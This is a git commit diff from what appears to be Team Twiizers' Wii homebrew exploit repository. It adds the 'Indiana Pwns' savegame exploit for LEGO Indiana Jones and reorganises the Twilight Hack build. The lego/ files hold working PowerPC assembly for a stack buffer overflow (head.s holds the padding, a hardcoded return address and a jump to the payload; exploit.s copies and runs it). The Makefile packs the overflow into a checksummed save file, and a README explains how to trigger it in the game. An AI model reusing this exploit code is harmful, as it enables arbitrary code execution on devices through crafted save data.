LEGO Indiana Jones

.gitignore

@@ -1,14 +1,3 @@
 *.o
 
 .version
-
-rzd?-?.?.bin
-rzd?.data
-
-rzd??.elf
-rzd??.slot
-
-title.bin
-
-zero16k
-FAILURE

Makefile

@@ -41,111 +41,22 @@ else
 endif
 
 
-targets := rzde-3.2.bin rzde-3.3.bin rzde-3.4.bin
-targets += rzdj-3.2.bin rzdj-3.3.bin rzdj-3.4.bin
-targets += rzdp-3.2.bin rzdp-3.3.bin rzdp-3.4.bin
-targets-short := rzde rzdj rzdp
-
-objs := twilight.o
-
-ppms := $(targets-short:%=%-icon.ppm) generic-banner.ppm
-assets := title.bin $(ppms)
-
-loader := loader/loader.bin
-
-
-titleid = $(shell perl titleid.pl $(1))
-
-
-# System menu 3.3 checks for the exploit, when a) you copy a save from SD,
-# and b) when the menu starts up; but for a) it only looks at the first
-# zeldaTp.dat file, and for b) it allows any file of non-aligned length.
-#
-# System menu 3.4 only looks at the last file in the wad when installing.
-#
-# System menu 4.0 finally avoids such silly bugs.
-
-define twintig
-	D=$(call titleid,$(1));				\
-	$(TOOLS)/twintig $$D $@ toc-$1
-endef
-
-
-all: $(targets)
-
-$(filter %-3.2.bin,$(targets)): %-3.2.bin: %.data
-$(filter %-3.3.bin,$(targets)): %-3.3.bin: %.data zero16k
-$(filter %-3.4.bin,$(targets)): %-3.4.bin: %.data FAILURE
-$(targets): %.bin: toc-% $(assets)
-	@echo "  TWINTIG   $@"
-	$(Q)$(call twintig,$*)
-
-saves := $(targets-short:%=%.data)
-
-rzde.data: rzde0.slot rzde2.slot
-rzdp.data: rzdp0.slot
-rzdj.data: rzdj0.slot
-$(saves): $(loader)
-	@echo "  ZELDAPACK $@"
-	$(Q)./pack.sh $@ $(filter %.slot,$^)
-	$(Q)$(TOOLS)/zelda-cksum $@
-	$(Q)cat $(loader) >> $@
-	$(Q)printf '\0' >> $@
-
-slots := rzde0.slot rzde2.slot rzdj0.slot rzdp0.slot
-
-$(slots): %.slot: %.elf
-	@echo "  OBJCOPY   $@"
-	$(Q)$(OBJCOPY) -Obinary $< $@
-
-elfs := $(slots:.slot=.elf)
-
-rzde0.elf: baddr := 0x8046a3e0+0
-rzde2.elf: baddr := 0x804519e0+0x0a94
-rzdj0.elf: baddr := 0x8044f860+0
-rzdp0.elf: baddr := 0x804522e0+0
-$(elfs): %.elf: twilight.lds %.o $(objs)
-	@echo "  LINK      $@"
-	$(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@
-
-exploit-objs := $(elfs:.elf=.o)
-
-$(exploit-objs): slot-name := Twilight Hack
-rzde0.o: slot-name := TwilightHack0
-rzde2.o: slot-name := TwilightHack2
-$(exploit-objs): %.o: start.S head.b
-	@echo "  ASSEMBLE  $@"
-	$(Q)$(CC) $(CFLAGS) -D NAME="$(slot-name)" -c $< -o $@
-
-%.o: %.c
-	@echo "  COMPILE   $@"
-	$(Q)$(CC) $(CFLAGS) -c $< -o $@
-
-title.bin: .version
-	@echo "  TITLEBIN  $@"
-	$(Q)perl make-title-bin.pl > $@
+all:
 
 .version: FORCE
 	$(Q)./describe.sh > .$@-tmp
 	$(Q)cmp -s $@ .$@-tmp || cp .$@-tmp $@
 	$(Q)rm .$@-tmp
 
-$(ppms): %.ppm: %.png
-	@echo "  PPM       $@"
-	$(Q)convert $< $@
-
-zero16k:
-	$(Q)dd if=/dev/zero bs=16384 count=1 2>/dev/null > $@
-
-FAILURE:
-	$(Q)echo FAILURE > $@
-
-$(loader): FORCE .version
+all: FORCE .version
 	$(Q)$(MAKE) -C loader
+	$(Q)$(MAKE) -C twilight
+	$(Q)$(MAKE) -C lego
 
 FORCE:
 
 clean:
-	-rm -f $(targets) $(saves) $(elfs) $(exploit-objs) $(objs) $(slots)
-	-rm -f .version title.bin zero16k FAILURE
+	-rm -f .version
 	$(MAKE) -C loader clean
+	$(MAKE) -C twilight clean
+	$(MAKE) -C lego clean

lego/.gitignore

@@ -0,0 +1,5 @@
+rli?.bin
+FILE_V28
+exploit.bin
+exploit.elf
+title.bin

lego/Makefile

@@ -0,0 +1,117 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+
+# Configuration:
+
+# What toolchain prefix should we use
+CROSS ?= broadway-
+
+# Where are the tools (http://git.infradead.org/users/segher/wii.git)
+TOOLS ?= $(HOME)/wii/segher
+
+# End of configuration.
+
+
+
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+
+ifeq ($(origin CC), default)
+	CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+	LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+
+
+# The compiler flags we need.
+
+CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750
+
+
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+
+ifeq ($(V),1)
+	Q :=
+else
+	Q := @
+	MAKEFLAGS += --no-print-directory
+endif
+
+
+targets := rlie.bin rlij.bin rlip.bin
+
+ppms := $(targets:%.bin=%-icon.ppm) rli-banner.ppm
+assets := title.bin $(ppms)
+
+loader := ../loader/loader.bin
+
+
+titleid = $(shell perl titleid.pl $(1))
+
+
+define twintig
+	D=$(call titleid,$(1));				\
+	$(TOOLS)/twintig $$D $@ toc-$1
+endef
+
+
+all: $(targets)
+
+$(targets): %.bin: toc-% FILE_V28 $(assets)
+	@echo "  TWINTIG   $@"
+	$(Q)$(call twintig,$*)
+
+FILE_V28: head.bin exploit.bin $(loader)
+	@echo "  LEGOSTACK $@"
+	$(Q)./pack.sh $@ $^
+	$(Q)$(TOOLS)/lego-cksum $@ 32688
+
+head.bin: head.elf
+	@echo "  OBJCOPY   $@"
+	$(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.bin: exploit.elf
+	@echo "  OBJCOPY   $@"
+	$(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.elf: baddr := 0x903b0780
+exploit.elf: lego.lds exploit.o
+	@echo "  LINK      $@"
+	$(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@
+
+head.elf: head.lds head.o
+	@echo "  LINK      $@"
+	$(Q)$(LD) -T $^ -o $@
+
+exploit.o: exploit.s
+	@echo "  ASSEMBLE  $@"
+	$(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+head.o: head.s head.b
+	@echo "  ASSEMBLE  $@"
+	$(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+title.bin: ../.version
+	@echo "  TITLEBIN  $@"
+	$(Q)perl make-title-bin.pl > $@
+
+../.version: FORCE
+	$(Q)$(MAKE) -C .. .version
+
+$(ppms): %.ppm: %.png
+	@echo "  PPM       $@"
+	$(Q)convert $< $@
+
+$(loader): FORCE
+	$(Q)$(MAKE) -C ../loader
+
+FORCE:
+
+clean:
+	-rm -f $(targets) FILE_V28
+	-rm -f exploit.bin exploit.elf exploit.o
+	-rm -f head.bin head.elf head.o
+	-rm -f title.bin

lego/README

@@ -0,0 +1,7 @@
+Extremely short instructions: put this savegame on your Wii (if you have
+one on there already that you want to keep, back it up first!), start the
+game, walk to the "art room" (find some walkthrough on the intertubes if
+you cannot find it), look at the second character, enjoy!
+
+Kudos to "roto" for finding the original buffer overflow, and many thanks
+for doing lots of testing!

lego/exploit.s

@@ -0,0 +1,31 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+	.section .start,"ax"
+
+start:
+	# Set up a stack frame.
+	lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
+
+	# Stop audio and video.
+	lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl
+	lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl
+
+	# Move code into place; a generous 32kB, starting at 64kB in
+	# the save file.
+
+	lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
+	lis 4,0x806c ; lwz 4,0xdc48-0x10000(4) ; addi 4,4,-4
+	addis 4,4,1 ; addi 4,4,end-start
+	li 0,0x2000 ; mtctr 0
+0:	lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b
+
+	# Sync caches on it.
+	li 0,0x0400 ; mtctr 0 ; mr 5,3
+0:	dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b
+	sync ; isync
+
+	# Go for it!
+	mtctr 3 ; bctr
+end:

lego/head.lds

@@ -0,0 +1,22 @@
+/* Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+   This code is licensed to you under the terms of the GNU GPL, version 2;
+   see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt  */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+/*	audio_stop = 0x800a3e80;
+	video_stop = 0x800b2120;
+
+	main = 0x90000020; */
+
+	.head 0x805a909c :
+	{
+		head.o(.start)
+		*(.text)
+		*(.rodata .rodata.*)
+		*(.data)
+		*(.bss)
+	}
+}

lego/head.s

@@ -0,0 +1,26 @@
+	.section ".start", "ax"
+
+	# FIXME
+	bptr = 0x806bdc48
+
+0:
+	.incbin "head.b"
+
+	# Smack the stack.
+	.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+	.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+	.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+	.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+	.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+	.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+	.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+	.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+	.long 0x11111111
+
+	# Return address; namely...
+	.long 0x805b0f30, 0x11111111, 0x11111111, 0x11111111
+
+	# Here.
+	lis 3,bptr@ha ; lwz 3,bptr@l(3) ; addis 3,3,1 ; mtctr 3 ; bctr
+
+	.fill 0x10000 - (. - 0b)

lego/lego.lds

@@ -0,0 +1,22 @@
+/* Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+   This code is licensed to you under the terms of the GNU GPL, version 2;
+   see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt  */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+	audio_stop = 0x800a3e80;
+	video_stop = 0x800b2120;
+
+	main = 0x90000020;
+
+	.twilight baddr :
+	{
+		rli*.o(.start)
+		*(.text)
+		*(.rodata .rodata.*)
+		*(.data)
+		*(.bss)
+	}
+}

lego/make-title-bin.pl

@@ -0,0 +1,16 @@
+#!/usr/bin/perl
+sub printline {
+	my $x = shift;
+	chomp $x;
+	$x .= "\0" x 32;
+	$x = substr $x, 0, 32;
+	$x =~ s/(.)/\0$1/g;
+
+	print $x;
+}
+
+$name = "Indiana Pwns, by Team Twiizers";
+$version = `cat ../.version`;
+
+printline $name;
+printline $version;

lego/pack.sh

@@ -0,0 +1,3 @@
+#!/bin/bash
+TARGET=$1; shift
+cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET

lego/toc-rlie

@@ -0,0 +1,4 @@
+title.bin
+rli-banner.ppm
+rlie-icon.ppm
+FILE_V28 FILE_V28

lego/toc-rlij

@@ -0,0 +1,4 @@
+title.bin
+rli-banner.ppm
+rlij-icon.ppm
+FILE_V28 FILE_V28

lego/toc-rlip

@@ -0,0 +1,4 @@
+title.bin
+rli-banner.ppm
+rlip-icon.ppm
+FILE_V28 FILE_V28

loader/main.c

@@ -5,8 +5,8 @@
 #include "loader.h"
 
 
-u8 *code_buffer = (u8 *)0x90100000;
-u8 *trampoline_buffer = (u8 *)0x80001800;
+static u8 *const code_buffer = (u8 *)0x90100000;
+static u8 *const trampoline_buffer = (u8 *)0x80001800;
 
 static void dsp_reset(void)
 {
@@ -107,7 +107,7 @@ int main(void)
 	video_init();
 	usbgecko_init();
 
-	printf("Twilight Hack %s\n", version);
+	printf("savezelda %s\n", version);
 	printf("\n");
 	printf("Copyright 2008,2009  Segher Boessenkool\n");
 	printf("Copyright 2008  Haxx Enterprises\n");

twilight/.gitignore

@@ -0,0 +1,10 @@
+rzd?-?.?.bin
+rzd?.data
+
+rzd??.elf
+rzd??.slot
+
+title.bin
+
+zero16k
+FAILURE

twilight/Makefile

@@ -0,0 +1,148 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+
+# Configuration:
+
+# What toolchain prefix should we use
+CROSS ?= broadway-
+
+# Where are the tools (http://git.infradead.org/users/segher/wii.git)
+TOOLS ?= $(HOME)/wii/segher
+
+# End of configuration.
+
+
+
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+
+ifeq ($(origin CC), default)
+	CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+	LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+
+
+# The compiler flags we need.
+
+CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750
+
+
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+
+ifeq ($(V),1)
+	Q :=
+else
+	Q := @
+	MAKEFLAGS += --no-print-directory
+endif
+
+
+targets := rzde-3.2.bin rzde-3.3.bin rzde-3.4.bin
+targets += rzdj-3.2.bin rzdj-3.3.bin rzdj-3.4.bin
+targets += rzdp-3.2.bin rzdp-3.3.bin rzdp-3.4.bin
+targets-short := rzde rzdj rzdp
+
+objs := twilight.o
+
+ppms := $(targets-short:%=%-icon.ppm) generic-banner.ppm
+assets := title.bin $(ppms)
+
+loader := ../loader/loader.bin
+
+
+titleid = $(shell perl titleid.pl $(1))
+
+
+# System menu 3.3 checks for the exploit, when a) you copy a save from SD,
+# and b) when the menu starts up; but for a) it only looks at the first
+# zeldaTp.dat file, and for b) it allows any file of non-aligned length.
+#
+# System menu 3.4 only looks at the last file in the wad when installing.
+#
+# System menu 4.0 finally avoids such silly bugs.
+
+define twintig
+	D=$(call titleid,$(1));				\
+	$(TOOLS)/twintig $$D $@ toc-$1
+endef
+
+
+all: $(targets)
+
+$(filter %-3.2.bin,$(targets)): %-3.2.bin: %.data
+$(filter %-3.3.bin,$(targets)): %-3.3.bin: %.data zero16k
+$(filter %-3.4.bin,$(targets)): %-3.4.bin: %.data FAILURE
+$(targets): %.bin: toc-% $(assets)
+	@echo "  TWINTIG   $@"
+	$(Q)$(call twintig,$*)
+
+saves := $(targets-short:%=%.data)
+
+rzde.data: rzde0.slot rzde2.slot
+rzdp.data: rzdp0.slot
+rzdj.data: rzdj0.slot
+$(saves): $(loader)
+	@echo "  ZELDAPACK $@"
+	$(Q)./pack.sh $@ $(filter %.slot,$^)
+	$(Q)$(TOOLS)/zelda-cksum $@
+	$(Q)cat $(loader) >> $@
+	$(Q)printf '\0' >> $@
+
+slots := rzde0.slot rzde2.slot rzdj0.slot rzdp0.slot
+
+$(slots): %.slot: %.elf
+	@echo "  OBJCOPY   $@"
+	$(Q)$(OBJCOPY) -Obinary $< $@
+
+elfs := $(slots:.slot=.elf)
+
+rzde0.elf: baddr := 0x8046a3e0+0
+rzde2.elf: baddr := 0x804519e0+0x0a94
+rzdj0.elf: baddr := 0x8044f860+0
+rzdp0.elf: baddr := 0x804522e0+0
+$(elfs): %.elf: twilight.lds %.o $(objs)
+	@echo "  LINK      $@"
+	$(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@
+
+exploit-objs := $(elfs:.elf=.o)
+
+$(exploit-objs): slot-name := Twilight Hack
+rzde0.o: slot-name := TwilightHack0
+rzde2.o: slot-name := TwilightHack2
+$(exploit-objs): %.o: start.S head.b
+	@echo "  ASSEMBLE  $@"
+	$(Q)$(CC) $(CFLAGS) -D NAME="$(slot-name)" -c $< -o $@
+
+%.o: %.c
+	@echo "  COMPILE   $@"
+	$(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+title.bin: ../.version
+	@echo "  TITLEBIN  $@"
+	$(Q)perl make-title-bin.pl > $@
+
+../.version: FORCE
+	$(Q)$(MAKE) -C .. .version
+
+$(ppms): %.ppm: %.png
+	@echo "  PPM       $@"
+	$(Q)convert $< $@
+
+zero16k:
+	$(Q)dd if=/dev/zero bs=16384 count=1 2>/dev/null > $@
+
+FAILURE:
+	$(Q)echo FAILURE > $@
+
+$(loader): FORCE
+	$(Q)$(MAKE) -C ../loader
+
+FORCE:
+
+clean:
+	-rm -f $(targets) $(saves) $(elfs) $(exploit-objs) $(objs) $(slots)
+	-rm -f title.bin zero16k FAILURE

twilight/make-title-bin.pl

@@ -10,7 +10,7 @@ sub printline {
 }
 
 $name = "Twilight Hack by Team Twiizers";
-$version = `cat .version`;
+$version = `cat ../.version`;
 
 printline $name;
 printline $version;

twilight/titleid.pl

@@ -0,0 +1,2 @@
+#!/usr/bin/perl
+print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0];